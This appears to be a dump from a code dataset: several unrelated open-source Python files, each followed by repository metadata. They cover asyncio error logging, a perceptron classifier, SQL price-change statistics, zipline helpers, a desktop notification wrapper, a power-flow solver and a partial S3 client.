class EnsureExceptionHandledGuard:
"""Helper for ensuring that Future's exceptions were handled.
This solves a nasty problem with Futures and Tasks that have an
exception set: if nobody asks for the exception, the exception is
never logged. This violates the Zen of Python: 'Errors should
never pass silently. Unless explicitly silenced.'
However, we don't want to log the exception as soon as
set_exception() is called: if the calling code is written
properly, it will get the exception and handle it properly. But
we *do* want to log it if result() or exception() was never called
-- otherwise developers waste a lot of time wondering why their
buggy code fails silently.
An earlier attempt added a __del__() method to the Future class
itself, but this backfired because the presence of __del__()
prevents garbage collection from breaking cycles. A way out of
this catch-22 is to avoid having a __del__() method on the Future
class itself, but instead to have a reference to a helper object
with a __del__() method that logs the traceback, where we ensure
that the helper object doesn't participate in cycles, and only the
Future has a reference to it.
The helper object is added when set_exception() is called. When
the Future is collected, and the helper is present, the helper
object is also collected, and its __del__() method will log the
traceback. When the Future's result() or exception() method is
called (and a helper object is present), it removes the the helper
object, after calling its clear() method to prevent it from
logging.
One downside is that we do a fair amount of work to extract the
traceback from the exception, even when it is never logged. It
would seem cheaper to just store the exception object, but that
references the traceback, which references stack frames, which may
reference the Future, which references the _EnsureExceptionHandledGuard,
and then the _EnsureExceptionHandledGuard would be included in a cycle,
which is what we're trying to avoid! As an optimization, we don't
immediately format the exception; we only do the work when
activate() is called, which call is delayed until after all the
Future's callbacks have run. Since usually a Future has at least
one callback (typically set by 'yield from') and usually that
callback extracts the callback, thereby removing the need to
format the exception.
PS. I don't claim credit for this solution. I first heard of it
in a discussion about closing files when they are collected.
"""
__slots__ = ['exc', 'tb', 'hndl', 'cls']
def __init__(self, exc, handler):
self.exc = exc
self.hndl = handler
self.cls = type(exc)
self.tb = None
def activate(self):
exc = self.exc
if exc is not None:
self.exc = None
self.tb = traceback.format_exception(exc.__class__, exc,
exc.__traceback__)
def clear(self):
self.exc = None
self.tb = None
def __del__(self):
if self.tb:
self.hndl(self.cls, self.tb)
|
mit
| -4,323,449,782,726,556,700
| 42.48
| 76
| 0.682306
| false
| 4.418699
| false
| false
| false
|
bhedayat/Neural-Nets
|
Perceptron.py
|
1
|
3593
|
# coding: utf-8
# In[22]:
#Flower Classifier with Perceptron
#Read in data
data = [] #training data
data1 = [] #test data
import numpy as np
import matplotlib.pyplot as plt
from random import randint
for line in file:
l = (line.split(","))
l[0] = float(l[0])
l[1] = float(l[1])
l[2] = float(l[2])
l[3] = float(l[3])
data.append (l)
for line1 in file1:
h = (line1.split(","))
h[0] = float(h[0])
h[1] = float(h[1])
h[2] = float(h[2])
h[3] = float(h[3])
data1.append (h)
#Label classes with numbers
for d in range(len(data)):
if data[d][4] == 'Iris-setosa\n':
data[d][4] = 0
elif data[d][4] == 'Iris-versicolor\n':
data[d][4] = 1
for d in range(len(data1)):
if data1[d][4] == 'Iris-setosa\n':
data1[d][4] = 0
elif data1[d][4] == 'Iris-versicolor\n':
data1[d][4] = 1
iris_data = np.array(data)
iris_test = np.array(data1)
#Normalize features with Z-score
for d in range(iris_data.shape[1]-1):
u = np.mean(iris_data[:,d])
s = np.std(iris_data[:,d])
iris_data[:,d] = (iris_data[:,d] - u)/s
iris_test[:,d] = (iris_test[:,d] - u)/s
#Scatter plots in different feature space
f1 = iris_data[:,0] #Sepal length
f2 = iris_data[:,1] #Sepal width
f3 = iris_data[:,2] #Petal length
f4 = iris_data[:,3] #Petal width
cluster = iris_data[:,4] #Flower class
plt.figure(1)
plt.scatter(f1[cluster==0],f2[cluster==0],marker='+')
plt.scatter(f1[cluster==1],f2[cluster==1],marker='^')
plt.xlabel('Sepal length')
plt.ylabel('Sepal width')
plt.title('Sepal length vs. Sepal width')
plt.figure(2)
plt.scatter(f1[cluster==0],f3[cluster==0],marker='+')
plt.scatter(f1[cluster==1],f3[cluster==1],marker='^')
plt.xlabel('Sepal length')
plt.ylabel('Petal length')
plt.title('Sepal length vs. Petal length')
plt.figure(3)
plt.scatter(f1[cluster==0],f4[cluster==0],marker='+')
plt.scatter(f1[cluster==1],f4[cluster==1],marker='^')
plt.xlabel('Sepal length')
plt.ylabel('Petal width')
plt.title('Sepal length vs. Petal width')
plt.figure(4)
plt.scatter(f2[cluster==0],f3[cluster==0],marker='+')
plt.scatter(f2[cluster==1],f3[cluster==1],marker='^')
plt.xlabel('Sepal width')
plt.ylabel('Petal length')
plt.title('Sepal width vs. Petal length')
plt.figure(5)
plt.scatter(f2[cluster==0],f4[cluster==0],marker='+')
plt.scatter(f2[cluster==1],f4[cluster==1],marker='^')
plt.xlabel('Sepal width')
plt.ylabel('Petal width')
plt.title('Sepal width vs. Petal width')
plt.figure(6)
plt.scatter(f3[cluster==0],f4[cluster==0],marker='+')
plt.scatter(f3[cluster==1],f4[cluster==1],marker='^')
plt.xlabel('Petal length')
plt.ylabel('Petal width')
plt.title('Petal length vs. Petal width')
#plt.show()
#Append bias to data set
x = -1*np.ones((len(iris_data),1))
a_iris_data = np.concatenate((x, iris_data), 1)
y = -1*np.ones((len(iris_test),1))
a_iris_test = np.concatenate((y, iris_test), 1)
w = [0]*(len(a_iris_data[0])-1)
#Perceptron Gradient Descent
alpha = 1 #Learning rate
for a in range(30):
r = randint(0,len(a_iris_data)-1) #randomly choose training examples
output = a_iris_data[r,0:5].dot(w)
teacher = a_iris_data[r,5]
if output >= -w[0]:
output = 1
elif output < -w[0]:
output = 0
w = w+alpha*(teacher-output)*(a_iris_data[r,0:5]) #delta rule
print(w)
#Testing accuracy
test_output = a_iris_test[:,0:5].dot(w)
for o in range(len(test_output)):
if test_output[o] >= -w[0]:
test_output[o] = 1
elif test_output[o] < -w[0]:
test_output[o] = 0
err = test_output == a_iris_test[:,5]
err = err.astype(int)
1 - np.mean(err)
# In[ ]:
|
apache-2.0
| -4,896,690,168,427,554,000
| 26.638462
| 72
| 0.623991
| false
| 2.519635
| true
| false
| false
|
vishakh/metamkt
|
metamkt/standalone/price_change_calculator.py
|
1
|
2433
|
import common
def calculate_price_change(conn, entity_id, mysql_interval):
result = conn.execute("""
select
(select price from PriceHistory where entity_id=%s order by timestamp desc limit 1) -
(select price from PriceHistory where entity_id=%s and timestamp < (utc_timestamp() - %s)
order by timestamp desc limit 1)""" % (entity_id, entity_id, mysql_interval))
change = result.fetchall()[0][0]
return change
def insert_price_change(conn, entity_id, interval, value):
conn.execute("""INSERT INTO PriceChange (entity_id, term, value) VALUES (%s, '%s', %s)"""
% (entity_id, interval, value))
def calculate_price_changes():
log = common.get_logger()
log.info('Calculating price changes..')
conn = common.get_connection()
trans = conn.begin()
try:
conn.execute("truncate PriceChange")
conn.execute("SELECT id FROM Entity")
users = conn.fetchall()
for user in users:
eid = user[0]
change = calculate_price_change(conn, eid, "INTERVAL 1 DAY")
if change is None:
change = 0
insert_price_change(conn, eid, "1D", change)
change = calculate_price_change(conn, eid, "INTERVAL 7 DAY")
if change is None:
change = 0
insert_price_change(conn, eid, "7D", change)
change = calculate_price_change(conn, eid, "INTERVAL 1 MONTH")
if change is None:
change = 0
insert_price_change(conn, eid, "1M", change)
change = calculate_price_change(conn, eid, "INTERVAL 3 MONTH")
if change is None:
change = 0
insert_price_change(conn, eid, "3M", change)
change = calculate_price_change(conn, eid, "INTERVAL 6 MONTH")
if change is None:
change = 0
insert_price_change(conn, eid, "6M", change)
change = calculate_price_change(conn, eid, "INTERVAL 1 YEAR")
if change is None:
change = 0
insert_price_change(conn, eid, "1Y", change)
trans.commit()
except:
trans.rollback()
raise
conn.close()
log.info('..done.')
def main():
calculate_price_changes()
if __name__ == "__main__":
main()
|
lgpl-3.0
| -6,761,154,637,958,323,000
| 31.026316
| 117
| 0.547061
| false
| 4.048253
| false
| false
| false
|
lsbardel/zipline
|
zipline/gens/utils.py
|
1
|
2276
|
#
# Copyright 2013 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytz
import numbers
from hashlib import md5
from datetime import datetime
from zipline.protocol import DATASOURCE_TYPE
from six import iteritems, b
def hash_args(*args, **kwargs):
"""Define a unique string for any set of representable args."""
arg_string = '_'.join([str(arg) for arg in args])
kwarg_string = '_'.join([str(key) + '=' + str(value)
for key, value in iteritems(kwargs)])
combined = ':'.join([arg_string, kwarg_string])
hasher = md5()
hasher.update(b(combined))
return hasher.hexdigest()
def assert_datasource_protocol(event):
"""Assert that an event meets the protocol for datasource outputs."""
assert event.type in DATASOURCE_TYPE
# Done packets have no dt.
if not event.type == DATASOURCE_TYPE.DONE:
assert isinstance(event.dt, datetime)
assert event.dt.tzinfo == pytz.utc
def assert_trade_protocol(event):
"""Assert that an event meets the protocol for datasource TRADE outputs."""
assert_datasource_protocol(event)
assert event.type == DATASOURCE_TYPE.TRADE
assert isinstance(event.sid, int)
assert isinstance(event.price, numbers.Real)
assert isinstance(event.volume, numbers.Integral)
assert isinstance(event.dt, datetime)
def assert_datasource_unframe_protocol(event):
"""Assert that an event is valid output of zp.DATASOURCE_UNFRAME."""
assert event.type in DATASOURCE_TYPE
def assert_sort_protocol(event):
"""Assert that an event is valid input to zp.FEED_FRAME."""
assert event.type in DATASOURCE_TYPE
def assert_sort_unframe_protocol(event):
"""Same as above."""
assert event.type in DATASOURCE_TYPE
|
apache-2.0
| -6,486,776,239,556,615,000
| 30.178082
| 79
| 0.710018
| false
| 3.917384
| false
| false
| false
|
emesene/emesene
|
emesene/gui/common/GNTPNotification.py
|
1
|
2006
|
# -*- coding: utf-8 -*-
# This file is part of emesene.
#
# emesene is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# emesene is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with emesene; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import gntp.notifier
import sys
import gui
from gui.base import Plus
NAME = 'GNTPNotification'
DESCRIPTION = 'Wrapper around GNTP for the notification system'
AUTHOR = 'joshf'
WEBSITE = 'www.github.com/joshf'
VERSION = '1.1'
def GNTPNotification(title, text, picture_path=None, const=None,
callback=None, tooltip=None):
title = Plus.msnplus_strip(title)
if sys.platform == 'darwin':
appicon = open(gui.theme.image_theme.logo).read()
imagepath = picture_path.replace( "file:///", "/" )
icon = open(imagepath).read()
else:
appicon = gui.theme.image_theme.logo
icon = picture_path
growl = gntp.notifier.GrowlNotifier(
applicationName = "emesene",
applicationIcon = appicon,
notifications = ["Generic Notification"],
defaultNotifications = ["Generic Notification"],
# hostname = "computer.example.com", # Defaults to localhost
# password = "abc123" # Defaults to a blank password
)
growl.register()
growl.notify(
noteType = "Generic Notification",
title = title,
description = text,
icon = icon,
sticky = False,
priority = 1,
)
|
gpl-3.0
| -8,234,481,197,409,525,000
| 30.84127
| 79
| 0.659023
| false
| 3.820952
| false
| false
| false
|
SanPen/GridCal
|
src/research/power_flow/helm/old/Helm.py
|
1
|
19811
|
# -*- coding: utf-8 -*-
# This file is part of GridCal.
#
# GridCal is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# GridCal is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GridCal. If not, see <http://www.gnu.org/licenses/>.
import Desarrollos.power_flow_research.example_grids as grids
import numpy as np
np.set_printoptions(linewidth=320)
# np.set_printoptions(precision=6, suppress=True, linewidth=320)
from numpy import where, zeros, ones, mod, conj, array, dot, complex128
from numpy import poly1d, r_, eye, hstack, diag, linalg, Inf
from enum import Enum
from itertools import product
from scipy import fftpack
from scipy.linalg import solve
from scipy.sparse.linalg import factorized, spsolve
from scipy.sparse import issparse, csc_matrix as sparse
# just in time compiler
# from numba import jit
# Set the complex precision to use
complex_type = complex128
class NodeType(Enum):
PQ = 1,
PV = 2,
REF = 3,
NONE = 4,
STO_DISPATCH = 5 # Storage dispatch, in practice it is the same as REF
# @jit(cache=True)
def pre_process(n_bus, Yseries, Vset, pq, pv, vd):
"""
Make the Helm System matrix
@param n_bus: Number of buses of the circuit
@param Yseries: Circuit admittance matrix of the series elements
@param Vset: Vector of voltages of those nodes where the voltage is controlled (AKA Slack and PV buses)
@param S: Vector of power injections at all the nodes
@param pq: list of PQ node indices
@param pv: list of PV node indices
@param vd: list of Slack node indices
@return:
"""
"""
Reduction of the circuit magnitudes.
Args:
n_bus:
Yseries:
slack_indices: Array of indices of the slack nodes
Vset:
S:
Output:
Yred: Reduced admittance matrix (Without the rows and columns belonging to slack buses)
I: Matrix of currents (In practice only one slack bus is selected, hence it is a vector) injected by the slack buses
Sred: Array of power injections of the buses that are not of type slack
types_red: Array of types of the buses that are not of type slack
non_slack_indices: Array of indices of the buses that are not of type slack
"""
# now to have efficient arrays of coefficients
map_idx = zeros(n_bus, dtype=np.int)
map_w = zeros(n_bus, dtype=np.int)
npq = 0
npv = 0
npqpv = 0
for i in pq:
map_idx[i] = npq
map_w[i] = npqpv
npq += 1
npqpv += 1
for i in pv:
map_idx[i] = npv
map_w[i] = npqpv
npv += 1
npqpv += 1
# build the expanded system matrix
Ysys = zeros((2*n_bus, 2*n_bus))
for a, b in product(range(n_bus), range(n_bus)):
Ysys[2*a, 2*b] = Yseries[a, b].real
Ysys[2*a, 2*b+1] = -Yseries[a, b].imag
Ysys[2*a+1, 2*b] = Yseries[a, b].imag
Ysys[2*a+1, 2*b+1] = Yseries[a, b].real
# set pv column
for a in pv:
b = a
Ysys[:, 2*b] = zeros(2 * n_bus)
# Ysys[a*2, b*2+1] = 0
Ysys[a*2+1, b*2] = 1
# set vd elements
for a in vd:
Ysys[a*2, :] = zeros(2 * n_bus)
Ysys[a*2 + 1, :] = zeros(2 * n_bus)
Ysys[a*2, a*2] = 1
Ysys[a*2+1, a*2+1] = 1
# print('Ysys\n', Ysys)
# build the PV matrix
Ypv = zeros((2 * n_bus, npv))
for a, b in product(r_[pq, pv], pv):
kk = map_idx[b]
Ypv[2*a, kk] = Yseries[a, b].real
Ypv[2*a+1, kk] = Yseries[a, b].imag
# print('Ypv\n', Ypv)
Vset2 = Vset * Vset
return sparse(Ysys), Ypv, Vset2, map_idx, map_w, npq, npv
# @jit(cache=True)
def RHS(n, nbus, Ysh, Ypv, S, Vset, Vset_abs2, C, W, Q, pq, pv, vd, map_idx, map_w):
"""
Right hand side calculation.
Args:
n: Order of the coefficients
nbus: Number of buses (not counting the slack buses)
Yrow: Vector where every elements the sum of the corresponding row of the reduced admittance matrix)
I: Vector of current injections (nbus elements)
S: Vector of power injections (nbus elements)
Vset: Vector of set voltages
Vset_abs2: Vetor with the voltage set points squared. (nbus elements)
C: Voltage coefficients (Ncoeff x nbus elements)
X: Weighted coefficients (Ncoeff x nbus elements)
R: Voltage convolution coefficients (Ncoeff x nbus elements)
W: Inverse coefficients structure (Ncoeff x nbus elements)
types: Types of the non slack buses (nbus elements)
Output:
rhs: Right hand side vector to solve the coefficients (2 * nbus elements)
"""
rhs = np.empty(2 * nbus)
Vre = ones(len(pv))
for k in pq:
val = RHS_PQ(n, k, Ysh, C, S, W, map_w)
rhs[2 * k] = val.real
rhs[2 * k + 1] = val.imag
for k in vd:
val = RHS_VD(n, k, Vset)
rhs[2 * k] = val.real
rhs[2 * k + 1] = val.imag
for k in pv:
val = RHS_PV(n, k, Ysh, S, C, Q, W, map_idx, map_w)
rhs[2 * k] = val.real
rhs[2 * k + 1] = val.imag
kk = map_idx[k]
Vre[kk] = calc_Vre(n, k, C, Vset_abs2).real
rhs -= Ypv[:, kk] * Vre[kk]
return rhs, Vre
def delta(n, k):
return n == k # is 1 for n==k, 0 otherwise
# @jit(cache=True)
def RHS_VD(n, k, Vset):
"""
Right hand side calculation for a PQ bus.
Args:
n: Order of the coefficients
k: Index of the bus
Vset: set voltage of the node
Output:
Right hand side value for slack nodes
"""
if n == 0:
return complex_type(1) * delta(n, 0)
else:
return (Vset[k] - complex_type(1)) * delta(n, 1)
# @jit(cache=True)
def RHS_PQ(n, k, Ysh, C, S, W, map_w):
"""
Right hand side calculation for a PQ bus.
Args:
n: Order of the coefficients
k: Index of the bus
Ysh: Vector where every elements the sum of the corresponding row of the reduced admittance matrix)
I: Vector of current injections (nbus elements)
S: Vector of power injections (nbus elements)
W: Inverse coefficients structure (Ncoeff x nbus elements)
Output:
Right hand side value
"""
if n == 0:
return 0
else:
kw = map_w[k]
return conj(S[k]) * conj(W[n-1, kw]) - Ysh[k] * C[n - 1, k] # ASU version
def calc_W(n, k, kw, C, W):
"""
Calculation of the inverse coefficients W. (only applicable for PQ buses)
Args:
n: Order of the coefficients
k: Index of the bus
C: Voltage coefficients (Ncoeff x nbus elements)
W: Inverse coefficients structure (Ncoeff x nbus elements)
Output:
Inverse coefficient of order n for the bus k
"""
if n == 0:
res = complex_type(1)
else:
res = complex_type(0)
for l in range(n):
res -= W[l, kw] * C[n-l, k]
res /= conj(C[0, k])
return res
def RHS_PV(n, k, Ysh, S, C, Q, W, map_idx, map_w):
"""
Right hand side calculation for a PQ bus.
Args:
n: Order of the coefficients
k: Index of the bus
Ysh: Vector where every elements the sum of the corresponding row of the shunt admittance matrix
S: Vector of power injections (nbus elements)
C: Voltage coefficients (Ncoeff x nbus elements)
Q: Reactive power coefficients (Ncoeff x nbus elements)
W: Inverse coefficients structure (Ncoeff x nbus elements)
Output:
Right hand side value for the pv nodes
"""
if n == 0:
return 0 # -1j * Q[0, kk] / conj(C[0, k])
else:
kk = map_idx[k]
kw = map_w[k]
val = complex_type(0)
for l in range(1, n): # this includes the n-1
val += Q[l, kk] * W[n-l, kw].conjugate()
n1 = n-1
rhs = S[k].real * W[n1, kw].conjugate() - (1j * val) - Ysh[k] * C[n1, k]
return rhs
def calc_Vre(n, k, C, Vset_abs2):
"""
Compute the real part of the voltage for PV ndes
Args:
n: order
k: PV node index
C: Structure of voltage coefficients
Vset_abs2: Square of the set voltage module
Returns:
Real part of the voltage for the PV nodes
"""
# vre = delta(n, 0) + 0.5 * delta(n, 1) * (Vset_abs2[k] - 1) - 0.5 * R
if n == 0:
return complex_type(1)
elif n == 1:
R = calc_R(n, k, C)
return 0.5 * (Vset_abs2[k] - 1) - 0.5 * R
else:
return complex_type(0)
return vre
def calc_R(n, k, C):
"""
Convolution coefficient
Args:
n: Order of the coefficients
k: Index of the bus
C: Voltage coefficients (Ncoeff x nbus elements)
Output:
Convolution coefficient of order n for the bus k
"""
result = complex_type(0)
for l in range(n+1):
result += C[l, k] * C[n-l, k].conjugate()
return result
def epsilon(Sn, n, E):
"""
Fast recursive Wynn's epsilon algorithm from:
NONLINEAR SEQUENCE TRANSFORMATIONS FOR THE ACCELERATION OF CONVERGENCE
AND THE SUMMATION OF DIVERGENT SERIES
by Ernst Joachim Weniger
"""
Zero = complex_type(0)
One = complex_type(1)
Tiny = np.finfo(complex_type).min
Huge = np.finfo(complex_type).max
E[n] = Sn
if n == 0:
estim = Sn
else:
AUX2 = Zero
for j in range(n, 0, -1): # range from n to 1 (both included)
AUX1 = AUX2
AUX2 = E[j-1]
DIFF = E[j] - AUX2
if abs(DIFF) <= Tiny:
E[j-1] = Huge
else:
if DIFF == 0:
DIFF = Tiny
E[j-1] = AUX1 + One / DIFF
if mod(n, 2) == 0:
estim = E[0]
else:
estim = E[1]
return estim, E
def pade_approximation(n, an, s=1):
"""
Computes the n/2 pade approximant of the series an at the approximation
point s
Arguments:
an: coefficient series
n: order of the series
s: point of approximation
Returns:
pade approximation at s
"""
nn = int(n/2)
if mod(nn, 2) == 0:
nn -= 1
L = nn
M = nn
an = np.ndarray.flatten(an)
rhs = an[L+1:L+M+1]
C = zeros((L, M), dtype=complex_type)
for i in range(L):
k = i + 1
C[i, :] = an[L-M+k:L+k]
try:
b = solve(C, -rhs) # bn to b1
except:
print()
return 0, zeros(L+1, dtype=complex_type), zeros(L+1, dtype=complex_type)
b = r_[1, b[::-1]] # b0 = 1
a = zeros(L+1, dtype=complex_type)
a[0] = an[0]
for i in range(L):
val = complex_type(0)
k = i + 1
for j in range(k+1):
val += an[k-j] * b[j]
a[i+1] = val
p = complex_type(0)
q = complex_type(0)
for i in range(L+1):
p += a[i] * s**i
q += b[i] * s**i
return p/q, a, b
def interprete_solution(nbus, npv, pv, pqvd, x_sol, Vre, map_idx):
"""
Assign the solution vector individual values to the correct places
Args:
nbus: number of system nodes
npv: number of pv nodes
types: types of each node
x_sol: solution vector to analyze
Vre: Vector or real part of the voltage for the PV nodes
map_idx: mapping array from normal bus index to PV index
Returns:
Voltages coefficients and reactive power coefficients for the PV nodes at the order of x_sol
"""
C = zeros(nbus, dtype=complex_type)
Q = zeros(npv)
# for k in pqvd: # non vectorized code
# C[k] = x_sol[2 * k] + 1j * x_sol[2 * k + 1]
# set the PQ and Slack nodes
C[pqvd] = x_sol[2 * pqvd] + 1j * x_sol[2 * pqvd + 1]
# for k in pv: # non vectorized code
# kk = map_idx[k]
# Q[kk] = x_sol[2 * k]
# C[k] = Vre[kk] + 1j * x_sol[2 * k + 1]
# Set the PV nodes
kk = map_idx[pv]
Q[kk] = x_sol[2 * pv]
C[pv] = Vre[kk] + 1j * x_sol[2 * pv + 1]
return C, Q
def helm(Y, Ys, Ysh, max_coefficient_count, S, voltage_set_points, pq, pv, vd, eps=1e-3, use_pade=True):
"""
Run the holomorphic embedding power flow
@param Y: Circuit complete admittance matrix
@param Ys: Circuit series elements admittance matrix
@param Ysh: Circuit shunt elements admittance matrix
@param max_coefficient_count: Maximum number of voltage coefficients to evaluate (Must be an odd number)
@param S: Array of power injections matching the admittance matrix size
@param voltage_set_points: Array of voltage set points matching the admittance matrix size
@param pq: list of PQ node indices
@param pv: list of PV node indices
@param vd: list of Slack node indices
@param eps: Tolerance
@param use_pade: Use the Padè approximation? If False the Epsilon algorithm is used
@return:
"""
nbus = np.shape(Ys)[0]
# The routines in this script are meant to handle sparse matrices, hence non-sparse ones are not allowed
assert(issparse(Ys))
# assert(not np.all((Ys + sparse(np.eye(nbus) * Ysh) != Y).data))
# Make bus type lists combinations that are going to be used later
pqvd = r_[pq, vd]
pqvd.sort()
pqpv = r_[pq, pv]
pqpv.sort()
print('Ymat:\n', Y.todense())
print('Yseries:\n', Ys.todense())
print('Yshunt:\n', Ysh)
# prepare the arrays
Ysys, Ypv, Vset, map_idx, map_w, npq, npv = pre_process(n_bus=nbus, Yseries=Ys, Vset=voltage_set_points,
pq=pq, pv=pv, vd=vd)
print('Ysys:\n', Ysys.todense())
# F = np.zeros(nbus, dtype=complex_type)
# F[Ysh.indices] = Ysh.data
# declare the matrix of coefficients that will lead to the voltage computation
C = zeros((0, nbus), dtype=complex_type)
# auxiliary array for the epsilon algorithm
E_v = zeros((0, nbus), dtype=complex_type)
E_q = zeros((0, npv), dtype=complex_type)
# Declare the inverse coefficients vector
# (it is actually a matrix; a vector of coefficients per coefficient order)
W = zeros((0, npq+npv), dtype=complex_type)
# Reactive power on the PV nodes
Q = zeros((0, npv), dtype=complex_type)
# Squared values of the voltage module for the buses that are not of slack type
Vset_abs2 = abs(voltage_set_points) ** 2
# progressive calculation of coefficients
n = 0
converged = False
inside_precision = True
errors = list()
errors_PV_P = list()
errors_PV_Q = list()
errors_PQ_P= list()
errors_PQ_Q = list()
voltages = list()
Sn_v = zeros(nbus, dtype=complex_type)
Sn_q = zeros(npv, dtype=complex_type)
voltages_vector = zeros(nbus, dtype=complex_type)
Vred_last = zeros(nbus, dtype=complex_type)
solve = factorized(Ysys)
# set the slack indices voltages
voltages_vector[vd] = voltage_set_points[vd]
while n <= max_coefficient_count and not converged and inside_precision:
# Reserve coefficients memory space
C = np.vstack((C, np.zeros((1, nbus), dtype=complex_type)))
E_v = np.vstack((E_v, np.zeros((1, nbus), dtype=complex_type)))
E_q = np.vstack((E_q, np.zeros((1, npv))))
W = np.vstack((W, np.zeros((1, npq+npv), dtype=complex_type)))
Q = np.vstack((Q, np.zeros((1, npv), dtype=complex_type)))
# get the system independent term to solve the coefficients
# n, nbus, F, Ypv, S, Vset, Vset_abs2, C, W, Q, pq, pv, vd, map_idx, map_w,
rhs, Vre = RHS(n, nbus, Ysh, Ypv, S, Vset, Vset_abs2, C, W, Q, pq, pv, vd, map_idx, map_w)
# Solve the linear system to obtain the new coefficients
x_sol = solve(rhs)
# assign the voltages and the reactive power values correctly
C[n, :], Q[n, :] = interprete_solution(nbus, npv, pv, pqvd, x_sol, Vre, map_idx)
# copy variables for the epsilon algorithm
if not use_pade:
E_v[n, :] = C[n, :]
E_q[n, :] = Q[n, :]
Sn_v += C[n, :]
Sn_q += Q[n, :]
# Update the inverse voltage coefficients W for the non slack nodes
for k in pqpv:
kw = map_w[k] # actual index in the coefficients structure
W[n, kw] = calc_W(n, k, kw, C, W)
# calculate the reactive power
for k in pv:
kk = map_idx[k]
if use_pade:
if mod(n, 2) == 0 and n > 2:
q, _, _ = pade_approximation(n, Q)
S[k] = S[k].real + 1j * q.real
else:
q, E_q[:, kk] = epsilon(Sn_q[kk], n, E_q[:, kk])
S[k] = S[k].real + 1j * q
# calculate the voltages
for k in pqpv:
if use_pade:
if mod(n, 2) == 0 and n > 2:
v, _, _ = pade_approximation(n, C[:, k])
voltages_vector[k] = v
else:
voltages_vector[k], E_v[:, k] = epsilon(Sn_v[k], n, E_v[:, k])
if np.isnan(voltages_vector[k]):
print('Maximum precision reached at ', n)
voltages_vector = Vred_last
inside_precision = False
break
Vred_last = voltages_vector.copy()
# Compose the voltage values from the coefficient series
voltages.append(voltages_vector.copy())
# print(voltages_vector)
# Calculate the error and check the convergence
Scalc = voltages_vector * conj(Y * voltages_vector)
power_mismatch = Scalc - S # complex power mismatch
power_mismatch_ = r_[power_mismatch[pv].real, power_mismatch[pq].real, power_mismatch[pq].imag] # concatenate error by type
# check for convergence
normF = linalg.norm(power_mismatch_, Inf)
errors.append(normF)
errors_PV_P.append(power_mismatch[pv].real)
errors_PV_Q.append(power_mismatch[pv].imag)
errors_PQ_P.append(power_mismatch[pq].real)
errors_PQ_Q.append(power_mismatch[pq].imag)
if normF < eps:
converged = True
else:
converged = False
n += 1 # increase the coefficients order
# errors_lst = [array(errors), array(errors_PV_P), array(errors_PV_Q), array(errors_PQ_P), array(errors_PQ_Q)]
return Vred_last, converged, normF, Scalc
def bifurcation_point(C, slackIndices):
"""
Computes the bifurcation point
@param C:
@return:
"""
npoints = 100
order_num, bus_num = np.shape(C)
# V(S) = P(S)/Q(S)
V = zeros((npoints, bus_num), dtype=complex_type)
L = zeros((npoints, bus_num))
for k in range(bus_num):
if k not in slackIndices:
_, p, q = pade_approximation(order_num, C[:, k])
# print(k, 'P:', p)
# print(k, 'Q:', q)
asint = np.roots(q[::-1])
asint = np.sort(abs(asint))
asint = asint[asint > 2]
print('Asymptotes', asint)
# print('Asymptote:', asint[0])
bpoint = asint[0]
# bpoint = max(asint)
lmda = np.linspace(1, bpoint, npoints+1)[:-1]
# lmda = np.linspace(1, 100, npoints)
pval = np.polyval(p[::-1], lmda)
qval = np.polyval(q[::-1], lmda)
V[:, k] = pval / qval
L[:, k] = lmda
return V, L
|
gpl-3.0
| -1,298,887,950,109,372,700
| 27.421808
| 132
| 0.570116
| false
| 3.184887
| false
| false
| false
|
RetailMeNot/acky
|
acky/s3.py
|
1
|
4051
|
from acky.api import AwsApiClient
try:
from urllib import parse
except ImportError:
import urlparse as parse
class InvalidURL(Exception):
def __init__(self, url, msg=None):
self.url = url
if not msg:
msg = "Invalid URL: {0}".format(url)
super(InvalidURL, self).__init__(msg)
def _parse_url(url=None):
"""Split the path up into useful parts: bucket, obj_key"""
if url is None:
return ('', '')
scheme, netloc, path, _, _ = parse.urlsplit(url)
if scheme != 's3':
raise InvalidURL(url, "URL scheme must be s3://")
if path and not netloc:
raise InvalidURL(url)
return netloc, path[1:]
class S3(AwsApiClient):
"""Interface for managing S3 buckets. (API Version 2006-03-01)"""
service_name = "s3"
def get(self, url=None, delimiter="/"):
"""Path is an s3 url. Ommiting the path or providing "s3://" as the
path will return a list of all buckets. Otherwise, all subdirectories
and their contents will be shown.
"""
params = {'Delimiter': delimiter}
bucket, obj_key = _parse_url(url)
if bucket:
params['Bucket'] = bucket
else:
return self.call("ListBuckets", response_data_key="Buckets")
if obj_key:
params['Prefix'] = obj_key
objects = self.call("ListObjects", response_data_key="Contents",
**params)
if objects:
for obj in objects:
obj['url'] = "s3://{0}/{1}".format(bucket, obj['Key'])
return objects
def create(self, url):
"""Create a bucket, directory, or empty file."""
bucket, obj_key = _parse_url(url)
if not bucket:
raise InvalidURL(url,
"You must specify a bucket and (optional) path")
if obj_key:
target = "/".join((bucket, obj_key))
else:
target = bucket
return self.call("CreateBucket", bucket=target)
def destroy(self, url, recursive=False):
"""Destroy a bucket, directory, or file. Specifying recursive=True
recursively deletes all subdirectories and files."""
bucket, obj_key = _parse_url(url)
if not bucket:
raise InvalidURL(url,
"You must specify a bucket and (optional) path")
if obj_key:
target = "/".join((bucket, obj_key))
else:
target = bucket
if recursive:
for obj in self.get(url, delimiter=''):
self.destroy(obj['url'])
return self.call("DeleteBucket", bucket=target)
def upload(self, local_path, remote_url):
"""Copy a local file to an S3 location."""
bucket, key = _parse_url(remote_url)
